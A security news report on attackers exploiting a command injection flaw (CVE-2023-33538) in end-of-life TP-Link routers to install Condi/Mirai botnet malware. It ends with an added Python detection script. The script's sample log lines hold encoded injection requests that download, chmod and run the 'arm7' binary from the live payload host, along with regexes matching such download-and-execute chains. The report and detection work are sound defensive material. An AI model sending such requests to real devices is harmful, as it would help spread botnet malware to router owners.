Cybersecurity experts are raising alarms as attackers actively exploit a command injection vulnerability in several end-of-life TP-Link Wi-Fi routers to deploy Mirai-based malware. The flaw, tracked as CVE-2023-33538, affects multiple TP-Link models that no longer receive firmware updates, leaving users exposed with no patch to apply.
Affected Devices and Vulnerability Details
The routers vulnerable to this exploitation include the TL-WR940N (versions 2 and 4), TL-WR740N (versions 1 and 2), and TL-WR841N (versions 8 and 10). The problem lies in the routers' web management interface, where a parameter of an HTTP GET request is passed to the underlying system without being validated or sanitized.
This oversight permits an attacker who can reach the management interface to execute arbitrary commands on the router, and nothing on the device warns the owner that it has happened. The observed attacks send crafted HTTP GET requests to the /userRpm/WlanNetworkRpm endpoint with shell commands embedded in the ssid parameter, which the router passes through unfiltered (the parameter choice matters; see below).
The Attack Mechanism and Malware Deployment
Once the router processes one of these malicious requests, the injected command chain downloads an ELF binary named arm7 from a remote server at IP address 51.38.137[.]113, marks it executable, and runs it immediately. The arm7 binary is a variant of the Condi IoT botnet malware, which is itself derived from the Mirai code base.
Researchers from Unit 42 at Palo Alto Networks observed these attacks after the vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) catalog in June 2025. Their telemetry showed widespread, automated attempts to exploit the flaw rather than targeted intrusions.
Malware Functionality and Further Spread
Once running, the arm7 binary works to persist on the device and to expand the botnet. It contacts a command-and-control (C2) server and can update itself by downloading fresh copies from the same hard-coded IP address. It also starts an HTTP server on the infected router, so the compromised device can serve the malware to other devices it compromises without contacting the original host.
The observed requests contain an error: they inject into the ssid parameter, whereas the vulnerable parameter is ssid1, so these particular attempts are likely to fail against the affected firmware. That is no reason to treat the devices as safe. The underlying vulnerability is real, a corrected request would work, and the same campaign can fix its mistake at any time.
Recommendations for Users
TP-Link has acknowledged the issue but confirmed that no patches will be provided, as these routers are end-of-life. The vendor advises users to replace the devices with supported models and, in the meantime, to change the default admin credentials, since exploitation requires authenticated access to the management interface. Changing the password raises the bar for an automated scanner but does not remove the flaw; only replacement does. Monitoring outbound traffic for connections to known malicious hosts, including the 51.38.137[.]113 address above, is also recommended, and a router that keeps reaching that address after a reboot should be treated as compromised.
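As an added example (not code from the article, from TP-Link or from Unit 42), the following Python script shows the detection logic a defender could run against the request pattern described in the attack section and the outbound-traffic check recommended here. It inspects constructed web-log lines for requests to /userRpm/WlanNetworkRpm whose ssid or ssid1 value contains shell metacharacters, a fetch-then-chmod-then-run chain, or the known payload host or filename, notes when a request targets ssid rather than the vulnerable ssid1 (the campaign's mistake), and flags flow records to the 51.38.137[.]113 host. Only the endpoint, parameter names, host and filename come from the article; the access-log layout, the flow-record layout and the injection syntax used in the sample lines are assumptions.

```python
"""Added example: detection of the CVE-2023-33538 exploitation pattern.

Not code from the article, TP-Link or Unit 42. Endpoint, parameter names,
payload host and filename come from the article; the log layouts and the
injection syntax in the constructed sample lines are assumptions.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/userRpm/WlanNetworkRpm"
WATCHED_PARAMS = ("ssid", "ssid1")  # campaign hits ssid; the vulnerable one is ssid1
PAYLOAD_HOST = "51.38.137.113"      # host serving the 'arm7' Condi/Mirai ELF
PAYLOAD_NAME = "arm7"

# Shell metacharacters that never belong in a Wi-Fi network name.
SHELL_META = re.compile(r"[;|&`$()\n]")
# A fetch followed by chmod or a ./ launch: the download-and-run chain described above.
DOWNLOAD_EXEC = re.compile(r"(wget|curl|tftp)\b.*(chmod|\./)", re.I | re.S)
# Assumed access-log layout: '<client> "<method> <url> HTTP/x.y" <status>'.
LOG_RE = re.compile(r'^(\S+) "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')


def inspect_request(line):
    """Return (client, reasons); reasons is empty when the line looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    client, _method, url, _status = m.groups()
    parts = urlsplit(url)
    if parts.path != VULN_PATH:
        return client, []
    reasons, hit_params = [], set()
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            value = unquote(value)  # parse_qs decoded once; also catch double-encoding
            before = len(reasons)
            if SHELL_META.search(value):
                reasons.append(f"shell metacharacter in {name}")
            if DOWNLOAD_EXEC.search(value):
                reasons.append(f"download-and-execute chain in {name}")
            if PAYLOAD_HOST in value or PAYLOAD_NAME in value:
                reasons.append(f"known payload indicator in {name}")
            if len(reasons) > before:
                hit_params.add(name)
    # The observed campaign injects into ssid instead of the vulnerable ssid1; such
    # requests probably fail on the device, but they still identify the scanner.
    if "ssid" in hit_params and "ssid1" not in hit_params:
        reasons.append("injection aimed at ssid, not ssid1: matches the misfiring campaign")
    return client, reasons


def scan_requests(lines):
    """Return [(client, reasons)] for every line with at least one reason."""
    hits = []
    for line in lines:
        client, reasons = inspect_request(line)
        if reasons:
            hits.append((client, reasons))
    return hits


def outbound_to_payload_host(flow_lines):
    """Flag flow records (assumed 'src dst dport proto' layout) that reach the payload host."""
    return [f for f in flow_lines if len(f.split()) > 1 and f.split()[1] == PAYLOAD_HOST]


# Constructed sample data (not real captures); metacharacters are percent-encoded
# the way a browser or scanner would send them.
SAMPLE_REQUESTS = [
    # legitimate admin renaming the network
    '192.168.0.10 "GET /userRpm/WlanNetworkRpm?ssid1=HomeNet&region=1&Save=Save HTTP/1.1" 200',
    # attempt in the style of the observed campaign: payload in ssid (the wrong parameter)
    '203.0.113.7 "GET /userRpm/WlanNetworkRpm?ssid=a%3Bwget%20http%3A%2F%2F51.38.137.113%2Farm7'
    '%3Bchmod%20777%20arm7%3B.%2Farm7&Save=Save HTTP/1.1" 200',
    # attempt against the vulnerable ssid1 parameter, using backtick substitution
    '198.51.100.9 "GET /userRpm/WlanNetworkRpm?ssid1=%60wget%20http%3A%2F%2F51.38.137.113%2Farm7%60 HTTP/1.1" 200',
    # unrelated page on the same router
    '192.168.0.10 "GET /userRpm/StatusRpm HTTP/1.1" 200',
]
SAMPLE_FLOWS = [
    "192.168.0.1 51.38.137.113 80 tcp",   # router fetching or re-downloading arm7
    "192.168.0.1 8.8.8.8 53 udp",
]

if __name__ == "__main__":
    for client, reasons in scan_requests(SAMPLE_REQUESTS):
        print(client, "->", "; ".join(reasons))
    for flow in outbound_to_payload_host(SAMPLE_FLOWS):
        print("outbound to payload host:", flow)
```

Run it as-is to see the two constructed attack lines flagged and the benign rename left alone. Matching on metacharacters rather than on one exact payload is deliberate: the campaign can switch from ssid to ssid1, or from `;` to backticks, without changing the endpoint, and the detection still fires.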
